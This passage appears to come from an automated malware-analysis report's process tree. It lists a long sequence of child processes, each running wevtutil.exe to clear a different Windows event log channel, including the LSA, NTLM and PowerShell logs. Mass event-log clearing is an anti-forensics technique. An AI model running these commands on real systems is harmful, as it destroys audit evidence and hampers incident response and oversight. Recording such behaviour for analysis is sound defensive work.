    wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Analytic"
    3⤵
    PID:4376
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-File/Analytic"
    3⤵
    PID:4388
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-IO/Operational"
    3⤵
    PID:4436
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Interrupt-Steering/Diagnostic"
    3⤵
    PID:4444
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-IoTrace/Diagnostic"
    3⤵
    PID:4428
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-LiveDump/Analytic"
    3⤵
    PID:4472
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Memory/Analytic"
    3⤵
    PID:4484
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Network/Analytic"
    3⤵
    PID:4500
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Pdc/Diagnostic"
    3⤵
    PID:4520
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Pep/Diagnostic"
    3⤵
    PID:4524
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Boot Diagnostic"
    3⤵
    PID:4512
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Configuration"
    3⤵
    PID:4592
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Configuration Diagnostic"
    3⤵
    PID:4600
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Device Enumeration Diagnostic"
    3⤵
    PID:4620
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Driver Diagnostic"
    3⤵
    PID:4632
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Diagnostic"
    3⤵
    PID:4644
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"
    3⤵
    PID:4660
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Operational"
    3⤵
    PID:4656
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Prefetch/Diagnostic"
    3⤵
    PID:4684
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Process/Analytic"
    3⤵
    PID:4708
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"
    3⤵
    PID:4716
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Analytic"
    3⤵
    PID:4756
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Performance"
    3⤵
    PID:4748
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-ShimEngine/Debug"
    3⤵
    PID:4796
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-ShimEngine/Diagnostic"
    3⤵
    PID:4804
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-ShimEngine/Operational"
    3⤵
    PID:4820
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Analytic"
    3⤵
    PID:4836
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Operational"
    3⤵
    PID:4868
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Analytic"
    3⤵
    PID:4880
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Debug"
    3⤵
    PID:4776
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Operational"
    3⤵
    PID:4896
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Errors"
    3⤵
    PID:2424
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Operational"
    3⤵
    PID:2348
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-XDV/Analytic"
    3⤵
    PID:4900
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Known Folders API Service"
    3⤵
    PID:4916
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-L2NA/Diagnostic"
    3⤵
    PID:4936
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LDAP-Client/Debug"
    3⤵
    PID:4948
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LSA/Diagnostic"
    3⤵
    PID:4964
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LSA/Operational"
    3⤵
    PID:5008
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LSA/Performance"
    3⤵
    PID:5024
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LUA-ConsentUI/Diagnostic"
    3⤵
    PID:5004
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Analytic"
    3⤵
    PID:5020
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Debug"
    3⤵
    PID:5036
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Operational"
    3⤵
    PID:5048
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LanguageProfile/Analytic"
    3⤵
    PID:204
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LimitsManagement/Diagnostic"
    3⤵
    PID:4164
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LinkLayerDiscoveryProtocol/Diagnostic"
    3⤵
    PID:4172
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LinkLayerDiscoveryProtocol/Operational"
    3⤵
    PID:1096
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LiveId/Analytic"
    3⤵
    PID:5060
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LiveId/Operational"
    3⤵
    PID:5076
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MPEG2-Video-Encoder-MFT_Analytic"
    3⤵
    PID:5092
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MPS-CLNT/Diagnostic"
    3⤵
    PID:5108
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MPS-DRV/Diagnostic"
    3⤵
    PID:4100
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MPS-SRV/Diagnostic"
    3⤵
    PID:4112
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MSFTEDIT/Diagnostic"
    3⤵
    PID:4116
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MSPaint/Admin"
    3⤵
    PID:3968
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MSPaint/Debug"
    3⤵
    PID:4212
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MSPaint/Diagnostic"
    3⤵
    PID:4260
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MUI/Admin"
    3⤵
    PID:4312
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MUI/Analytic"
    3⤵
    PID:4344
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MUI/Debug"
    3⤵
    PID:4368
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MUI/Operational"
    3⤵
    PID:4384
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Media-Streaming/DMC"
    3⤵
    PID:4404
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Media-Streaming/DMR"
    3⤵
    PID:4392
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Media-Streaming/MDE"
    3⤵
    PID:4412
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFCaptureEngine/MFCaptureEngine"
    3⤵
    PID:4464
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"
    3⤵
    PID:4456
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader"
    3⤵
    PID:4468
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/Transform"
    3⤵
    PID:4488
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MediaFoundation-Performance/SARStreamResource"
    3⤵
    PID:4508
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MediaFoundation-PlayAPI/Analytic"
    3⤵
    PID:4564
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MemoryDiagnostics-Results/Debug"
    3⤵
    PID:4548
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Minstore/Analytic"
    3⤵
    PID:4512
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Minstore/Debug"
    3⤵
    PID:4592
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Mobile-Broadband-Experience-Api-Internal/Analytic"
    3⤵
    PID:4600
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Mobile-Broadband-Experience-Api/Analytic"
    3⤵
    PID:4620
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Mobile-Broadband-Experience-Parser-Task/Analytic"
    3⤵
    PID:4632
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Mobile-Broadband-Experience-Parser-Task/Operational"
    3⤵
    PID:4644
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Mobile-Broadband-Experience-SmsApi/Analytic"
    3⤵
    PID:4660
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Mobile-Broadband-Experience-SmsRouter/Admin"
    3⤵
    PID:4656
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Mobile-Broadband-Experience-SmsRouter/Analytic"
    3⤵
    PID:4684
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MobilityCenter/Performance"
    3⤵
    PID:4708
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Mprddm/Operational"
    3⤵
    PID:4716
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NCSI/Analytic"
    3⤵
    PID:4756
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NCSI/Operational"
    3⤵
    PID:4748
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NDF-HelperClassDiscovery/Debug"
    3⤵
    PID:4796
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NDIS-PacketCapture/Diagnostic"
    3⤵
    PID:4804
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NDIS/Diagnostic"
    3⤵
    PID:4820
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NDIS/Operational"
    3⤵
    PID:4836
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NFC-Class-Extension/Analytical"
    3⤵
    PID:4868
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NTLM/Operational"
    3⤵
    PID:4880
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NWiFi/Diagnostic"
    3⤵
    PID:4776
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Narrator/Diagnostic"
    3⤵
    PID:4896
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Ncasvc/Operational"
    3⤵
    PID:2424
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NcdAutoSetup/Diagnostic"
    3⤵
    PID:2984
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NcdAutoSetup/Operational"
    3⤵
    PID:4960
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NdisImPlatform/Operational"
    3⤵
    PID:4920
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Ndu/Diagnostic"
    3⤵
    PID:4952
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetShell/Performance"
    3⤵
    PID:4940
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Network-Connection-Broker"
    3⤵
    PID:4988
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Network-DataUsage/Analytic"
    3⤵
    PID:5000
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Network-Setup/Diagnostic"
    3⤵
    PID:5040
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Network-and-Sharing-Center/Diagnostic"
    3⤵
    PID:5028
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetworkBridge/Diagnostic"
    3⤵
    PID:5044
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetworkLocationWizard/Operational"
    3⤵
    PID:3244
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Diagnostic"
    3⤵
    PID:4188
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Operational"
    3⤵
    PID:1160
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetworkProvider/Operational"
    3⤵
    PID:4176
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetworkProvisioning/Analytic"
    3⤵
    PID:4200
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetworkProvisioning/Operational"
    3⤵
    PID:3292
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetworkSecurity/Debug"
    3⤵
    PID:5088
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetworkStatus/Analytic"
    3⤵
    PID:5104
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Networking-Correlation/Diagnostic"
    3⤵
    PID:5116
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Networking-RealTimeCommunication/Tracing"
    3⤵
    PID:1588
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NlaSvc/Diagnostic"
    3⤵
    PID:4104
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NlaSvc/Operational"
    3⤵
    PID:4120
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Ntfs/Operational"
    3⤵
    PID:1004
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Ntfs/Performance"
    3⤵
    PID:4124
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Ntfs/WHC"
    3⤵
    PID:4208
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NvdimmN/Analytic"
    3⤵
    PID:4204
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NvdimmN/Diagnostic"
    3⤵
    PID:4284
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NvdimmN/Operational"
    3⤵
    PID:4276
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OLE/Clipboard-Performance"
    3⤵
    PID:4320
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OLEACC/Debug"
    3⤵
    PID:4352
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OLEACC/Diagnostic"
    3⤵
    PID:4432
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OOBE-FirstLogonAnim/Diagnostic"
    3⤵
    PID:4388
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OOBE-Machine-Core/Diagnostic"
    3⤵
    PID:4436
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OOBE-Machine-DUI/Diagnostic"
    3⤵
    PID:4444
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OOBE-Machine-DUI/Operational"
    3⤵
    PID:4428
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OOBE-Machine-Plugins-Wireless/Diagnostic"
    3⤵
    PID:4472
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Analytic"
    3⤵
    PID:4484
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Debug"
    3⤵
    PID:4500
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Operational"
    3⤵
    PID:4520
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OfflineFiles/SyncLog"
    3⤵
    PID:4524
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OneBackup/Debug"
    3⤵
    PID:4580
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OneX/Diagnostic"
    3⤵
    PID:4596
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OneX/Operational"
    3⤵
    PID:4664
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OobeLdr/Analytic"
    3⤵
    PID:4676
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OtpCredentialProvider/Operational"
    3⤵
    PID:4688
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PCI/Diagnostic"
    3⤵
    PID:4692
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PackageStateRoaming/Analytic"
    3⤵
    PID:4704
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PackageStateRoaming/Debug"
    3⤵
    PID:4724
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PackageStateRoaming/Operational"
    3⤵
    PID:4800
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ParentalControls/Operational"
    3⤵
    PID:4816
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Partition/Analytic"
    3⤵
    PID:4832
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Partition/Diagnostic"
    3⤵
    PID:4848
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PeerToPeerDrtEventProvider/Diagnostic"
    3⤵
    PID:4864
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PerceptionRuntime/Operational"
    3⤵
    PID:4860
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PerceptionSensorDataService/Operational"
    3⤵
    PID:4844
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PhotoAcq/Analytic"
    3⤵
    PID:4232
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PlayToManager/Analytic"
    3⤵
    PID:4876
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PmemDisk/Analytic"
    3⤵
    PID:4764
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PmemDisk/Diagnostic"
    3⤵
    PID:4760
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PmemDisk/Operational"
    3⤵
    PID:4892
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Policy/Analytic"
    3⤵
    PID:4132
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Policy/Operational"
    3⤵
    PID:4924
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PortableDeviceStatusProvider/Analytic"
    3⤵
    PID:4900
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PortableDeviceSyncProvider/Analytic"
    3⤵
    PID:2404
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Power-Meter-Polling/Diagnostic"
    3⤵
    PID:4956
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PowerCfg/Diagnostic"
    3⤵
    PID:4968
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PowerCpl/Diagnostic"
    3⤵
    PID:4980
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PowerEfficiencyDiagnostics/Diagnostic"
    3⤵
    PID:4996
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PowerShell-DesiredStateConfiguration-FileDownloadManager/Analytic"
    3⤵
    PID:5008
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PowerShell-DesiredStateConfiguration-FileDownloadManager/Debug"
    3⤵
    PID:5056
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PowerShell-DesiredStateConfiguration-FileDownloadManager/Operational"
    3⤵
    PID:848
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PowerShell/Admin"
    3⤵
    PID:3240
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PowerShell/Analytic"
    3⤵
    PID:4192
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PowerShell/Debug"
    3⤵
    PID:4180
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PowerShell/Operational"
    3⤵
    PID:4188
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PriResources-Deployment/Diagnostic"
    3⤵
    PID:1160
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PriResources-Deployment/Operational"
    3⤵
    PID:4176
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PrimaryNetworkIcon/Performance"
    3⤵
    PID:4200
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PrintBRM/Admin"
    3⤵
    PID:3292
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PrintDialogs/Analytic"
    3⤵
    PID:5088
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PrintDialogs3D/Analytic"
    3⤵
    PID:5104
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PrintService-USBMon/Debug"
    3⤵
    PID:5116
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PrintService/Admin"
    3⤵
    PID:4144
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PrintService/Debug"
    3⤵
    PID:4104
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PrintService/Operational"
    3⤵
    PID:4120
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ProcessStateManager/Diagnostic"
    3⤵
    PID:1004
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Program-Compatibility-Assistant/Analytic"
    3⤵
    PID:4124
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Program-Compatibility-Assistant/CompatAfterUpgrade"
    3⤵
    PID:4208
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Provisioning-Diagnostics-Provider/Admin"
    3⤵
    PID:4204
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Provisioning-Diagnostics-Provider/Debug"
    3⤵
    PID:4284
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Proximity-Common/Diagnostic"
    3⤵
    PID:4276
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Proximity-Common/Informational"
    3⤵
    PID:4376
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Proximity-Common/Performance"
    3⤵
    PID:4320
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PushNotification-Developer/Debug"
    3⤵
    PID:4432
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PushNotification-InProc/Debug"
    3⤵
    PID:4388
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PushNotification-Platform/Admin"
    3⤵
    PID:4436
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PushNotification-Platform/Debug"
    3⤵
    PID:4504
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PushNotification-Platform/Operational"
    3⤵
    PID:4516
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-QoS-Pacer/Diagnostic"
    3⤵
    PID:4532
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-QoS-qWAVE/Debug"
    3⤵
    PID:4572
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RPC-Proxy/Debug"
    3⤵
    PID:4560
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RPC/Debug"
    3⤵
    PID:4608
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RPC/EEInfo"
    3⤵
    PID:4616
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RRAS/Debug"
    3⤵
    PID:4628
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RRAS/Operational"
    3⤵
    PID:4620
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RadioManager/Analytic"
    3⤵
    PID:4596
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Ras-NdisWanPacketCapture/Diagnostic"
    3⤵
    PID:4676
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RasAgileVpn/Debug"
    3⤵
    PID:4644
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RasAgileVpn/Operational"
    3⤵
    PID:4712
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ReFS/Operational"
    3⤵
    PID:4656
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Analytic"
    3⤵
    PID:4684
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Operational"
    3⤵
    PID:4728
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Analytic"
    3⤵
    PID:4752
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Operational"
    3⤵
    PID:4788
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Regsvr32/Operational"
    3⤵
    PID:4812
- - C:\Windows\system32\wevtutil.exe
